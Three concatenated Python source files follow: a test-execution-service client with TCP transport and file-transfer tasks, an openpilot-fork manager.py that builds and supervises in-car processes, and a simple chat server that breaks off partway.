return self.asyncToSync(self.asyncUploadString, sContent, sRemoteFile, cMsTimeout, fIgnoreErrors);
def asyncDownloadFile(self, sRemoteFile, sLocalFile, cMsTimeout = 30000, fIgnoreErrors = False):
"""
Initiates a download file task.
Returns True on success, False on failure (logged).
The task returns True on success, False on failure (logged).
"""
return self.startTask(cMsTimeout, fIgnoreErrors, "downloadFile", self.taskDownloadFile, (sRemoteFile, sLocalFile));
def syncDownloadFile(self, sRemoteFile, sLocalFile, cMsTimeout = 30000, fIgnoreErrors = False):
"""Synchronous version."""
return self.asyncToSync(self.asyncDownloadFile, sRemoteFile, sLocalFile, cMsTimeout, fIgnoreErrors);
def asyncDownloadString(self, sRemoteFile, sEncoding = 'utf-8', fIgnoreEncodingErrors = True,
cMsTimeout = 30000, fIgnoreErrors = False):
"""
Initiates a download string task.
Returns True on success, False on failure (logged).
The task returns the downloaded file as a decoded string on success, False on failure (logged).
"""
return self.startTask(cMsTimeout, fIgnoreErrors, "downloadString",
self.taskDownloadString, (sRemoteFile, sEncoding, fIgnoreEncodingErrors));
def syncDownloadString(self, sRemoteFile, sEncoding = 'utf-8', fIgnoreEncodingErrors = True,
cMsTimeout = 30000, fIgnoreErrors = False):
"""Synchronous version."""
return self.asyncToSync(self.asyncDownloadString, sRemoteFile, sEncoding, fIgnoreEncodingErrors,
cMsTimeout, fIgnoreErrors);
def asyncUnpackFile(self, sRemoteFile, sRemoteDir, cMsTimeout = 30000, fIgnoreErrors = False):
"""
Initiates an unpack file task.
Returns True on success, False on failure (logged).
The task returns True on success, False on failure (logged).
"""
return self.startTask(cMsTimeout, fIgnoreErrors, "unpackFile", self.taskUnpackFile, \
(sRemoteFile, sRemoteDir));
def syncUnpackFile(self, sRemoteFile, sRemoteDir, cMsTimeout = 30000, fIgnoreErrors = False):
"""Synchronous version."""
return self.asyncToSync(self.asyncUnpackFile, sRemoteFile, sRemoteDir, cMsTimeout, fIgnoreErrors);
class TransportTcp(TransportBase):
"""
TCP transport layer for the TXS client session class.
"""
def __init__(self, sHostname, uPort, fReversedSetup):
"""
Save the parameters. The session will call us back to make the
connection later on its worker thread.
"""
TransportBase.__init__(self, utils.getCallerName());
self.sHostname = sHostname;
self.fReversedSetup = fReversedSetup;
self.uPort = uPort if uPort is not None else 5042 if fReversedSetup is False else 5048;
self.oSocket = None;
self.oWakeupW = None;
self.oWakeupR = None;
self.fConnectCanceled = False;
self.fIsConnecting = False;
self.oCv = threading.Condition();
self.abReadAhead = array.array('B');
def toString(self):
return '<%s sHostname=%s, fReversedSetup=%s, uPort=%s, oSocket=%s,'\
' fConnectCanceled=%s, fIsConnecting=%s, oCv=%s, abReadAhead=%s>' \
% (TransportBase.toString(self), self.sHostname, self.fReversedSetup, self.uPort, self.oSocket,
self.fConnectCanceled, self.fIsConnecting, self.oCv, self.abReadAhead);
def __isInProgressXcpt(self, oXcpt):
""" In progress exception? """
try:
if isinstance(oXcpt, socket.error):
try:
if oXcpt.errno == errno.EINPROGRESS:
return True;
except: pass;
# Windows?
try:
if oXcpt.errno == errno.EWOULDBLOCK:
return True;
except: pass;
except:
pass;
return False;
def __isWouldBlockXcpt(self, oXcpt):
""" Would block exception? """
try:
if isinstance(oXcpt, socket.error):
try:
if oXcpt.errno == errno.EWOULDBLOCK:
return True;
except: pass;
try:
if oXcpt.errno == errno.EAGAIN:
return True;
except: pass;
except:
pass;
return False;
def __isConnectionReset(self, oXcpt):
""" Connection reset by Peer or others. """
try:
if isinstance(oXcpt, socket.error):
try:
if oXcpt.errno == errno.ECONNRESET:
return True;
except: pass;
try:
if oXcpt.errno == errno.ENETRESET:
return True;
except: pass;
except:
pass;
return False;
def _closeWakeupSockets(self):
""" Closes the wakup sockets. Caller should own the CV. """
oWakeupR = self.oWakeupR;
self.oWakeupR = None;
if oWakeupR is not None:
oWakeupR.close();
oWakeupW = self.oWakeupW;
self.oWakeupW = None;
if oWakeupW is not None:
oWakeupW.close();
return None;
def cancelConnect(self):
# This is bad stuff.
self.oCv.acquire();
reporter.log2('TransportTcp::cancelConnect: fIsConnecting=%s oSocket=%s' % (self.fIsConnecting, self.oSocket));
self.fConnectCanceled = True;
if self.fIsConnecting:
oSocket = self.oSocket;
self.oSocket = None;
if oSocket is not None:
reporter.log2('TransportTcp::cancelConnect: closing the socket');
oSocket.close();
oWakeupW = self.oWakeupW;
self.oWakeupW = None;
if oWakeupW is not None:
reporter.log2('TransportTcp::cancelConnect: wakeup call');
try: oWakeupW.send(b'cancelled!\n'); # bytes, for Python 3 compatibility.
except: reporter.logXcpt();
try: oWakeupW.shutdown(socket.SHUT_WR);
except: reporter.logXcpt();
oWakeupW.close();
self.oCv.release();
def _connectAsServer(self, oSocket, oWakeupR, cMsTimeout):
""" Connects to the TXS server as server, i.e. the reversed setup. """
assert(self.fReversedSetup);
reporter.log2('TransportTcp::_connectAsServer: oSocket=%s, cMsTimeout=%u' % (oSocket, cMsTimeout));
# Workaround for bind() failure...
try:
oSocket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1);
except:
reporter.errorXcpt('socket.setsockopt(SO_REUSEADDR) failed');
return None;
# Bind the socket and make it listen.
try:
oSocket.bind((self.sHostname, self.uPort));
except:
reporter.errorXcpt('socket.bind((%s,%s)) failed' % (self.sHostname, self.uPort));
return None;
try:
oSocket.listen(1);
except:
reporter.errorXcpt('socket.listen(1) failed');
return None;
# Accept connections.
oClientSocket = None;
tClientAddr = None;
try:
(oClientSocket, tClientAddr) = oSocket.accept();
except socket.error as e:
if not self.__isInProgressXcpt(e):
raise;
# Do the actual waiting.
reporter.log2('TransportTcp::accept: operation in progress (%s)...' % (e,));
try:
select.select([oSocket, oWakeupR], [], [oSocket, oWakeupR], cMsTimeout / 1000.0);
except socket.error as e:
if e.errno != errno.EBADF or not self.fConnectCanceled:
raise;
reporter.log('socket.select() on accept was canceled');
return None;
except:
reporter.logXcpt('socket.select() on accept');
# Try accept again.
try:
(oClientSocket, tClientAddr) = oSocket.accept();
except socket.error as e:
if not self.__isInProgressXcpt(e):
if e.errno != errno.EBADF or not self.fConnectCanceled:
raise;
reporter.log('socket.accept() was canceled');
return None;
reporter.log('socket.accept() timed out');
return False;
except:
reporter.errorXcpt('socket.accept() failed');
return None;
except:
reporter.errorXcpt('socket.accept() failed');
return None;
# Store the connected socket and throw away the server socket.
self.oCv.acquire();
if not self.fConnectCanceled:
self.oSocket.close();
self.oSocket = oClientSocket;
self.sHostname = "%s:%s" % (tClientAddr[0], tClientAddr[1]);
self.oCv.release();
return True;
def _connectAsClient(self, oSocket, oWakeupR, cMsTimeout):
""" Connects to the TXS server as client. """
assert(not self.fReversedSetup);
# Connect w/ timeouts.
rc = None;
try:
oSocket.connect((self.sHostname, self.uPort));
rc = True;
except socket.error as oXcpt:
iRc = oXcpt.errno;
if self.__isInProgressXcpt(oXcpt):
# Do the actual waiting.
reporter.log2('TransportTcp::connect: operation in progress (%s)...' % (oXcpt,));
try:
ttRc = select.select([oWakeupR], [oSocket], [oSocket, oWakeupR], cMsTimeout / 1000.0);
if len(ttRc[1]) + len(ttRc[2]) == 0:
raise socket.error(errno.ETIMEDOUT, 'select timed out');
iRc = oSocket.getsockopt(socket.SOL_SOCKET, socket.SO_ERROR);
rc = iRc == 0;
except socket.error as oXcpt2:
iRc = oXcpt2.errno;
except:
iRc = -42;
reporter.fatalXcpt('socket.select() on connect failed');
if rc is True:
pass;
elif iRc == errno.ECONNREFUSED \
or iRc == errno.EHOSTUNREACH \
or iRc == errno.EINTR \
or iRc == errno.ENETDOWN \
or iRc == errno.ENETUNREACH \
or iRc == errno.ETIMEDOUT:
rc = False; # try again.
else:
if iRc != errno.EBADF or not self.fConnectCanceled:
reporter.fatalXcpt('socket.connect((%s,%s)) failed; iRc=%s' % (self.sHostname, self.uPort, iRc));
reporter.log2('TransportTcp::connect: rc=%s iRc=%s' % (rc, iRc));
except:
reporter.fatalXcpt('socket.connect((%s,%s)) failed' % (self.sHostname, self.uPort));
return rc;
def connect(self, cMsTimeout):
# Create a non-blocking socket.
reporter.log2('TransportTcp::connect: cMsTimeout=%s sHostname=%s uPort=%s' % (cMsTimeout, self.sHostname, self.uPort));
try:
oSocket = socket.socket(socket.AF_INET, socket.SOCK_STREAM, 0);
except:
reporter.fatalXcpt('socket.socket() failed');
return None;
try:
oSocket.setblocking(0);
except:
oSocket.close();
reporter.fatalXcpt('socket.setblocking(0) failed');
return None;
# Create wakeup socket pair for unix (select doesn't wake up on socket close on Linux).
oWakeupR = None;
oWakeupW = None;
if hasattr(socket, 'socketpair'):
try: (oWakeupR, oWakeupW) = socket.socketpair(); # pylint: disable=E1101
except: reporter.logXcpt('socket.socketpair() failed');
# Update the state.
self.oCv.acquire();
rc = None;
if not self.fConnectCanceled:
self.oSocket = oSocket;
self.oWakeupW = oWakeupW;
self.oWakeupR = oWakeupR;
self.fIsConnecting = True;
self.oCv.release();
# Try connect.
if oWakeupR is None:
oWakeupR = oSocket; # Avoid select failure.
if self.fReversedSetup:
rc = self._connectAsServer(oSocket, oWakeupR, cMsTimeout);
else:
rc = self._connectAsClient(oSocket, oWakeupR, cMsTimeout);
oSocket = None;
# Update the state and cleanup on failure/cancel.
self.oCv.acquire();
if rc is True and self.fConnectCanceled:
rc = False;
self.fIsConnecting = False;
if rc is not True:
if self.oSocket is not None:
self.oSocket.close();
self.oSocket = None;
self._closeWakeupSockets();
self.oCv.release();
reporter.log2('TransportTcp::connect: returning %s' % (rc,));
return rc;
def disconnect(self, fQuiet = False):
if self.oSocket is not None:
self.abReadAhead = array.array('B');
# Try shutting down the socket gracefully (draining it).
try:
self.oSocket.shutdown(socket.SHUT_WR);
except:
if not fQuiet:
reporter.error('shutdown(SHUT_WR)');
try:
self.oSocket.setblocking(0); # just in case it's not set.
sData = "1";
while sData:
sData = self.oSocket.recv(16384);
except:
pass;
# Close it.
self.oCv.acquire();
try: self.oSocket.setblocking(1);
except: pass;
self.oSocket.close();
self.oSocket = None;
else:
self.oCv.acquire();
self._closeWakeupSockets();
self.oCv.release();
def sendBytes(self, abBuf, cMsTimeout):
if self.oSocket is None:
reporter.error('TransportTcp.sendBytes: No connection.');
return False;
# Try send it all.
try:
cbSent = self.oSocket.send(abBuf);
if cbSent == len(abBuf):
return True;
except Exception as oXcpt:
if not self.__isWouldBlockXcpt(oXcpt):
reporter.errorXcpt('TransportTcp.sendBytes: %s bytes' % (len(abBuf)));
return False;
cbSent = 0;
# Do a timed send.
msStart = base.timestampMilli();
while True:
cMsElapsed = base.timestampMilli() - msStart;
if cMsElapsed > cMsTimeout:
reporter.error('TransportTcp.sendBytes: %s bytes timed out (1)' % (len(abBuf)));
break;
# wait.
try:
ttRc = select.select([], [self.oSocket], [self.oSocket], (cMsTimeout - cMsElapsed) / 1000.0);
if ttRc[2] and not ttRc[1]:
reporter.error('TransportTcp.sendBytes: select returned with exception');
break;
if not ttRc[1]:
reporter.error('TransportTcp.sendBytes: %s bytes timed out (2)' % (len(abBuf)));
break;
except:
reporter.errorXcpt('TransportTcp.sendBytes: select failed');
break;
# Try send more.
try:
cbSent += self.oSocket.send(abBuf[cbSent:]);
if cbSent == len(abBuf):
return True;
except Exception as oXcpt:
if not self.__isWouldBlockXcpt(oXcpt):
reporter.errorXcpt('TransportTcp.sendBytes: %s bytes' % (len(abBuf)));
break;
return False;
def __returnReadAheadBytes(self, cb):
""" Internal worker for recvBytes. """
assert(len(self.abReadAhead) >= cb);
abRet = self.abReadAhead[:cb];
self.abReadAhead = self.abReadAhead[cb:];
return abRet;
def recvBytes(self, cb, cMsTimeout, fNoDataOk):
if self.oSocket is None:
reporter.error('TransportTcp.recvBytes(%s,%s): No connection.' % (cb, cMsTimeout));
return None;
# Try read in some more data without bothering with timeout handling first.
if len(self.abReadAhead) < cb:
try:
abBuf = self.oSocket.recv(cb - len(self.abReadAhead));
if abBuf:
self.abReadAhead.extend(array.array('B', abBuf));
except Exception as oXcpt:
if not self.__isWouldBlockXcpt(oXcpt):
reporter.errorXcpt('TransportTcp.recvBytes: 0/%s bytes' % (cb,));
return None;
if len(self.abReadAhead) >= cb:
return self.__returnReadAheadBytes(cb);
# Timeout loop.
msStart = base.timestampMilli();
while True:
cMsElapsed = base.timestampMilli() - msStart;
if cMsElapsed > cMsTimeout:
if not fNoDataOk or self.abReadAhead:
reporter.error('TransportTcp.recvBytes: %s/%s bytes timed out (1)' % (len(self.abReadAhead), cb));
break;
# Wait.
try:
ttRc = select.select([self.oSocket], [], [self.oSocket], (cMsTimeout - cMsElapsed) / 1000.0);
if ttRc[2] and not ttRc[0]:
reporter.error('TransportTcp.recvBytes: select returned with exception');
break;
if not ttRc[0]:
if not fNoDataOk or self.abReadAhead:
reporter.error('TransportTcp.recvBytes: %s/%s bytes timed out (2) fNoDataOk=%s'
% (len(self.abReadAhead), cb, fNoDataOk));
break;
except:
reporter.errorXcpt('TransportTcp.recvBytes: select failed');
break;
# Try read more.
try:
abBuf = self.oSocket.recv(cb - len(self.abReadAhead));
if not abBuf:
reporter.error('TransportTcp.recvBytes: %s/%s bytes (%s) - connection has been shut down'
% (len(self.abReadAhead), cb, fNoDataOk));
self.disconnect();
return None;
self.abReadAhead.extend(array.array('B', abBuf));
except Exception as oXcpt:
reporter.log('recv => exception %s' % (oXcpt,));
if not self.__isWouldBlockXcpt(oXcpt):
if not fNoDataOk or not self.__isConnectionReset(oXcpt) or self.abReadAhead:
reporter.errorXcpt('TransportTcp.recvBytes: %s/%s bytes (%s)' % (len(self.abReadAhead), cb, fNoDataOk));
break;
# Done?
if len(self.abReadAhead) >= cb:
return self.__returnReadAheadBytes(cb);
#reporter.log('recv => None len(self.abReadAhead) -> %d' % (len(self.abReadAhead), ));
return None;
def isConnectionOk(self):
if self.oSocket is None:
return False;
try:
ttRc = select.select([], [], [self.oSocket], 0.0);
if ttRc[2]:
return False;
self.oSocket.send(array.array('B')); # send zero bytes.
except:
return False;
return True;
def isRecvPending(self, cMsTimeout = 0):
try:
ttRc = select.select([self.oSocket], [], [], cMsTimeout / 1000.0);
if not ttRc[0]:
return False;
except:
pass;
return True;
def openTcpSession(cMsTimeout, sHostname, uPort = None, fReversedSetup = False, cMsIdleFudge = 0):
"""
Opens a connection to a Test Execution Service via TCP, given its name.
"""
reporter.log2('openTcpSession(%s, %s, %s, %s, %s)' % \
(cMsTimeout, sHostname, uPort, fReversedSetup, cMsIdleFudge));
try:
oTransport = TransportTcp(sHostname, uPort, fReversedSetup);
oSession = Session(oTransport, cMsTimeout, cMsIdleFudge);
except:
reporter.errorXcpt(None, 15);
return None;
return oSession;
def tryOpenTcpSession(cMsTimeout, sHostname, uPort = None, fReversedSetup = False, cMsIdleFudge = 0):
"""
Tries to open a connection to a Test Execution Service via TCP, given its name.
This differs from openTcpSession in that it won't log a connection failure
as an error.
"""
try:
oTransport = TransportTcp(sHostname, uPort, fReversedSetup);
oSession = Session(oTransport, cMsTimeout, cMsIdleFudge, fTryConnect = True);
except:
reporter.errorXcpt(None, 15);
return None;
return oSession;
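#
# End-to-end usage sketch (host address and paths are made up):
#
#   oTxs = openTcpSession(30 * 1000, '192.168.56.101');
#   if oTxs is not None and oTxs.waitForTask(30 * 1000):
#       oTxs.syncMkDirPath('/tmp/testdir');
#       oTxs.syncUploadFile('payload.tar.gz', '/tmp/testdir/payload.tar.gz');
#       oTxs.syncUnpackFile('/tmp/testdir/payload.tar.gz', '/tmp/testdir');
#       oTxs.syncExec('/bin/uname', ('/bin/uname', '-a'));
#       oTxs.syncDisconnect();
#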
|
manager.py
|
#!/usr/bin/env python3.7
import os
import time
import sys
import fcntl
import errno
import signal
import subprocess
import datetime
from selfdrive.dragonpilot.dragonconf import dragonpilot_set_params
from common.basedir import BASEDIR
sys.path.append(os.path.join(BASEDIR, "pyextra"))
os.environ['BASEDIR'] = BASEDIR
TOTAL_SCONS_NODES = 1170
prebuilt = os.path.exists(os.path.join(BASEDIR, 'prebuilt'))
# Create folders needed for msgq
try:
os.mkdir("/dev/shm")
except FileExistsError:
pass
if os.path.isfile('/EON'):
os.chmod("/dev/shm", 0o777)
def unblock_stdout():
# get a non-blocking stdout
child_pid, child_pty = os.forkpty()
if child_pid != 0: # parent
# child is in its own process group, manually pass kill signals
signal.signal(signal.SIGINT, lambda signum, frame: os.kill(child_pid, signal.SIGINT))
signal.signal(signal.SIGTERM, lambda signum, frame: os.kill(child_pid, signal.SIGTERM))
fcntl.fcntl(sys.stdout, fcntl.F_SETFL,
fcntl.fcntl(sys.stdout, fcntl.F_GETFL) | os.O_NONBLOCK)
while True:
try:
dat = os.read(child_pty, 4096)
except OSError as e:
if e.errno == errno.EIO:
break
continue
if not dat:
break
try:
sys.stdout.write(dat.decode('utf8'))
except (OSError, IOError, UnicodeDecodeError):
pass
os._exit(os.wait()[1])
if __name__ == "__main__":
unblock_stdout()
from common.spinner import Spinner
else:
from common.spinner import FakeSpinner as Spinner
import importlib
import traceback
from multiprocessing import Process
# Run scons
spinner = Spinner()
spinner.update("0")
if not prebuilt:
for retry in [True, False]:
# run scons
env = os.environ.copy()
env['SCONS_PROGRESS'] = "1"
scons = subprocess.Popen(["scons", "-j4"], cwd=BASEDIR, env=env, stderr=subprocess.PIPE)
# Read progress from stderr and update spinner
while scons.poll() is None:
try:
line = scons.stderr.readline()
if line is None:
continue
line = line.rstrip()
prefix = b'progress: '
if line.startswith(prefix):
i = int(line[len(prefix):])
if spinner is not None:
spinner.update("%d" % (50.0 * (i / TOTAL_SCONS_NODES)))
elif len(line):
print(line.decode('utf8'))
except Exception:
pass
if scons.returncode != 0:
if retry:
print("scons build failed, make clean")
subprocess.check_call(["scons", "-c"], cwd=BASEDIR, env=env)
else:
raise RuntimeError("scons build failed")
else:
break
import cereal
import cereal.messaging as messaging
from common.params import Params
import selfdrive.crash as crash
from selfdrive.swaglog import cloudlog
from selfdrive.registration import register
from selfdrive.version import version, dirty
from selfdrive.loggerd.config import ROOT
from selfdrive.launcher import launcher
from common import android
from common.apk import update_apks, pm_apply_packages, start_frame
ThermalStatus = cereal.log.ThermalData.ThermalStatus
# comment out anything you don't want to run
managed_processes = {
"thermald": "selfdrive.thermald",
"uploader": "selfdrive.loggerd.uploader",
"deleter": "selfdrive.loggerd.deleter",
"controlsd": "selfdrive.controls.controlsd",
"plannerd": "selfdrive.controls.plannerd",
"radard": "selfdrive.controls.radard",
"ubloxd": ("selfdrive/locationd", ["./ubloxd"]),
"loggerd": ("selfdrive/loggerd", ["./loggerd"]),
"logmessaged": "selfdrive.logmessaged",
"tombstoned": "selfdrive.tombstoned",
"logcatd": ("selfdrive/logcatd", ["./logcatd"]),
"proclogd": ("selfdrive/proclogd", ["./proclogd"]),
"boardd": ("selfdrive/boardd", ["./boardd"]), # not used directly
"pandad": "selfdrive.pandad",
"ui": ("selfdrive/ui", ["./ui"]),
"calibrationd": "selfdrive.locationd.calibrationd",
"paramsd": ("selfdrive/locationd", ["./paramsd"]),
"camerad": ("selfdrive/camerad", ["./camerad"]),
"sensord": ("selfdrive/sensord", ["./sensord"]),
"gpsd": ("selfdrive/sensord", ["./gpsd"]),
"updated": "selfdrive.updated",
"monitoringd": ("selfdrive/modeld", ["./monitoringd"]),
"modeld": ("selfdrive/modeld", ["./modeld"]),
"dashcamd": "selfdrive.dragonpilot.dashcamd.dashcamd",
"shutdownd": "selfdrive.dragonpilot.shutdownd.shutdownd",
"appd": "selfdrive.dragonpilot.appd.appd",
}
daemon_processes = {
"manage_athenad": ("selfdrive.athena.manage_athenad", "AthenadPid"),
}
running = {}
def get_running():
return running
# due to qualcomm kernel bugs SIGKILLing camerad sometimes causes page table corruption
unkillable_processes = ['camerad']
# processes to end with SIGINT instead of SIGTERM
interrupt_processes = []
# processes to end with SIGKILL instead of SIGTERM
kill_processes = ['sensord', 'paramsd']
persistent_processes = [
'thermald',
'logmessaged',
'logcatd',
'tombstoned',
'uploader',
'ui',
'updated',
'shutdownd',
'appd',
]
car_started_processes = [
'controlsd',
'plannerd',
'loggerd',
'sensord',
'radard',
'calibrationd',
'paramsd',
'camerad',
'modeld',
'monitoringd',
'proclogd',
'ubloxd',
'gpsd',
'deleter',
'dashcamd',
]
def register_managed_process(name, desc, car_started=False):
global managed_processes, car_started_processes, persistent_processes
print("registering %s" % name)
managed_processes[name] = desc
if car_started:
car_started_processes.append(name)
else:
persistent_processes.append(name)
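# Usage sketch (hypothetical process name): forks can extend the tables above
# at import time instead of editing them, e.g.
#   register_managed_process("mydaemond", "selfdrive.mydaemond", car_started=True)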
# ****************** process management functions ******************
def nativelauncher(pargs, cwd):
# exec the process
os.chdir(cwd)
# because when extracted from pex zips permissions get lost -_-
os.chmod(pargs[0], 0o700)
os.execvp(pargs[0], pargs)
def start_managed_process(name):
if name in running or name not in managed_processes:
return
proc = managed_processes[name]
if isinstance(proc, str):
cloudlog.info("starting python %s" % proc)
running[name] = Process(name=name, target=launcher, args=(proc,))
else:
pdir, pargs = proc
cwd = os.path.join(BASEDIR, pdir)
cloudlog.info("starting process %s" % name)
running[name] = Process(name=name, target=nativelauncher, args=(pargs, cwd))
running[name].start()
def start_daemon_process(name):
params = Params()
proc, pid_param = daemon_processes[name]
pid = params.get(pid_param)
if pid is not None:
try:
os.kill(int(pid), 0)
# process is running (kill is a poorly-named system call)
return
except OSError:
# process is dead
pass
cloudlog.info("starting daemon %s" % name)
proc = subprocess.Popen(['python', '-m', proc],
stdin=open('/dev/null', 'r'),
stdout=open('/dev/null', 'w'),
stderr=open('/dev/null', 'w'),
preexec_fn=os.setpgrp)
params.put(pid_param, str(proc.pid))
def prepare_managed_process(p):
proc = managed_processes[p]
if isinstance(proc, str):
# import this python
cloudlog.info("preimporting %s" % proc)
importlib.import_module(proc)
elif os.path.isfile(os.path.join(BASEDIR, proc[0], "Makefile")):
# build this process
cloudlog.info("building %s" % (proc,))
try:
subprocess.check_call(["make", "-j4"], cwd=os.path.join(BASEDIR, proc[0]))
except subprocess.CalledProcessError:
# make clean if the build failed
cloudlog.warning("building %s failed, make clean" % (proc, ))
subprocess.check_call(["make", "clean"], cwd=os.path.join(BASEDIR, proc[0]))
subprocess.check_call(["make", "-j4"], cwd=os.path.join(BASEDIR, proc[0]))
def kill_managed_process(name):
if name not in running or name not in managed_processes:
return
cloudlog.info("killing %s" % name)
if running[name].exitcode is None:
if name in interrupt_processes:
os.kill(running[name].pid, signal.SIGINT)
elif name in kill_processes:
os.kill(running[name].pid, signal.SIGKILL)
else:
running[name].terminate()
# Process().join(timeout) will hang due to a python 3 bug: https://bugs.python.org/issue28382
# We have to poll the exitcode instead
# running[name].join(5.0)
t = time.time()
while time.time() - t < 5 and running[name].exitcode is None:
time.sleep(0.001)
if running[name].exitcode is None:
if name in unkillable_processes:
cloudlog.critical("unkillable process %s failed to exit! rebooting in 15 if it doesn't die" % name)
running[name].join(15.0)
if running[name].exitcode is None:
cloudlog.critical("FORCE REBOOTING PHONE!")
os.system("date >> /sdcard/unkillable_reboot")
os.system("reboot")
raise RuntimeError
else:
cloudlog.info("killing %s with SIGKILL" % name)
os.kill(running[name].pid, signal.SIGKILL)
running[name].join()
cloudlog.info("%s is dead with %d" % (name, running[name].exitcode))
del running[name]
def cleanup_all_processes(signal, frame):
cloudlog.info("caught ctrl-c %s %s" % (signal, frame))
pm_apply_packages('disable')
for name in list(running.keys()):
kill_managed_process(name)
cloudlog.info("everything is dead")
# ****************** run loop ******************
def manager_init(should_register=True):
if should_register:
reg_res = register()
if reg_res:
dongle_id, dongle_secret = reg_res
else:
raise Exception("server registration failed")
else:
dongle_id = "c"*16
# set dongle id
cloudlog.info("dongle id is " + dongle_id)
os.environ['DONGLE_ID'] = dongle_id
cloudlog.info("dirty is %d" % dirty)
if not dirty:
os.environ['CLEAN'] = '1'
cloudlog.bind_global(dongle_id=dongle_id, version=version, dirty=dirty, is_eon=True)
crash.bind_user(id=dongle_id)
crash.bind_extra(version=version, dirty=dirty, is_eon=True)
os.umask(0)
try:
os.mkdir(ROOT, 0o777)
except OSError:
pass
# ensure shared libraries are readable by apks
os.chmod(BASEDIR, 0o755)
os.chmod(os.path.join(BASEDIR, "cereal"), 0o755)
os.chmod(os.path.join(BASEDIR, "cereal", "libmessaging_shared.so"), 0o755)
def manager_thread():
# now loop
thermal_sock = messaging.sub_sock('thermal')
cloudlog.info("manager start")
cloudlog.info({"environ": os.environ})
# save boot log
subprocess.call(["./loggerd", "--bootlog"], cwd=os.path.join(BASEDIR, "selfdrive/loggerd"))
params = Params()
# start daemon processes
for p in daemon_processes:
start_daemon_process(p)
# start persistent processes
for p in persistent_processes:
start_managed_process(p)
# start frame
pm_apply_packages('enable')
start_frame()
if os.getenv("NOBOARD") is None:
start_managed_process("pandad")
logger_dead = False
while 1:
msg = messaging.recv_sock(thermal_sock, wait=True)
# uploader is gated based on the phone temperature
if msg.thermal.thermalStatus >= ThermalStatus.yellow:
kill_managed_process("uploader")
else:
start_managed_process("uploader")
if msg.thermal.freeSpace < 0.05:
logger_dead = True
if msg.thermal.started:
for p in car_started_processes:
if p == "loggerd" and logger_dead:
kill_managed_process(p)
else:
start_managed_process(p)
else:
logger_dead = False
for p in reversed(car_started_processes):
kill_managed_process(p)
# check the status of all processes, did any of them die?
running_list = ["%s%s\u001b[0m" % ("\u001b[32m" if running[p].is_alive() else "\u001b[31m", p) for p in running]
cloudlog.debug(' '.join(running_list))
# Exit main loop when uninstall is needed
if params.get("DoUninstall", encoding='utf8') == "1":
break
def manager_prepare(spinner=None):
# build all processes
os.chdir(os.path.dirname(os.path.abspath(__file__)))
  # Spinner resumes from where the earlier setup stage left off (50% when not prebuilt)
total = 100.0 if prebuilt else 50.0
for i, p in enumerate(managed_processes):
if spinner is not None:
spinner.update("%d" % ((100.0 - total) + total * (i + 1) / len(managed_processes),))
prepare_managed_process(p)
def uninstall():
cloudlog.warning("uninstalling")
with open('/cache/recovery/command', 'w') as f:
f.write('--wipe_data\n')
# IPowerManager.reboot(confirm=false, reason="recovery", wait=true)
android.reboot(reason="recovery")
def main():
# the flippening!
os.system('LD_LIBRARY_PATH="" content insert --uri content://settings/system --bind name:s:user_rotation --bind value:i:1')
# disable bluetooth
os.system('service call bluetooth_manager 8')
# support additional internal only extensions
try:
import selfdrive.manager_extensions
selfdrive.manager_extensions.register(register_managed_process) # pylint: disable=no-member
except ImportError:
pass
params = Params()
params.manager_start()
# set unset params
if params.get("CommunityFeaturesToggle") is None:
params.put("CommunityFeaturesToggle", "0")
if params.get("CompletedTrainingVersion") is None:
params.put("CompletedTrainingVersion", "0")
if params.get("IsMetric") is None:
params.put("IsMetric", "0")
if params.get("RecordFront") is None:
params.put("RecordFront", "0")
if params.get("HasAcceptedTerms") is None:
params.put("HasAcceptedTerms", "0")
if params.get("HasCompletedSetup") is None:
params.put("HasCompletedSetup", "0")
if params.get("IsUploadRawEnabled") is None:
params.put("IsUploadRawEnabled", "1")
if params.get("IsLdwEnabled") is None:
params.put("IsLdwEnabled", "1")
if params.get("IsGeofenceEnabled") is None:
params.put("IsGeofenceEnabled", "-1")
if params.get("SpeedLimitOffset") is None:
params.put("SpeedLimitOffset", "0")
if params.get("LongitudinalControl") is None:
params.put("LongitudinalControl", "0")
if params.get("LimitSetSpeed") is None:
params.put("LimitSetSpeed", "0")
if params.get("LimitSetSpeedNeural") is None:
params.put("LimitSetSpeedNeural", "0")
if params.get("LastUpdateTime") is None:
t = datetime.datetime.now().isoformat()
params.put("LastUpdateTime", t.encode('utf8'))
if params.get("OpenpilotEnabledToggle") is None:
params.put("OpenpilotEnabledToggle", "1")
dragonpilot_set_params(params)
# is this chffrplus?
if os.getenv("PASSIVE") is not None:
params.put("Passive", str(int(os.getenv("PASSIVE"))))
if params.get("Passive") is None:
raise Exception("Passive must be set to continue")
update_apks()
manager_init()
manager_prepare(spinner)
spinner.close()
if os.getenv("PREPAREONLY") is not None:
return
if params.get("DragonEnableLogger", encoding='utf8') == "0":
del managed_processes['loggerd']
del managed_processes['tombstoned']
if params.get("DragonEnableUploader", encoding='utf8') == "0":
del managed_processes['uploader']
# SystemExit on sigterm
signal.signal(signal.SIGTERM, lambda signum, frame: sys.exit(1))
try:
manager_thread()
except Exception:
traceback.print_exc()
crash.capture_exception()
finally:
cleanup_all_processes(None, None)
if params.get("DoUninstall", encoding='utf8') == "1":
uninstall()
if __name__ == "__main__":
main()
# manual exit because we are forked
sys.exit(0)
|
server.py
|
#!/usr/bin/env python3
"""Server for multithreaded (asynchronous) chat application."""
from socket import AF_INET, socket, SOCK_STREAM
from threading import Thread
def accept_incoming_connections():
"""Sets up handling for incoming clients."""
while True:
client, client_address = SERVER.accept()
print("%s:%s has connected." % client_address)
client.send(bytes("Greetings from the server. you are connected now", "utf8"))
addresses[client] = client_address
        Thread(target=handle_client, args=(client, client_address)).start()
def handle_client(client, client_address):  # Takes the client socket and its address as arguments.
"""Handles a single client connection."""
    host, port = client_address
    name = str(host) + " " + str(port)
welcome = 'Welcome %s! If you ever want to quit, type {quit} to exit.' % str(name)
client.send(bytes(welcome, "utf8"))
msg = "%s has joined the chat!" % str(name)
broadcast(bytes(msg, "utf8"))
clients[client] = client_address
while True:
msg = client.recv(BUFSIZ)
if msg != bytes("{quit}", "utf8"):
print(msg.decode("utf-8"))
broadcast(msg, name+": ")
else:
client.send(bytes("{quit}", "utf8"))
client.close()
del clients[client]
broadcast(bytes("%s has left the chat." % name, "utf8"))
break
def broadcast(msg, prefix=""): # prefix is for name identification.
"""Broadcasts a message tso all the clients."""
for sock in clients:
#print(sock)
sock.send(bytes(prefix, "utf8")+msg)
clients = {}
addresses = {}
HOST = ''
PORT = 33000
BUFSIZ = 1024
ADDR = (HOST, PORT)
SERVER = socket(AF_INET, SOCK_STREAM)
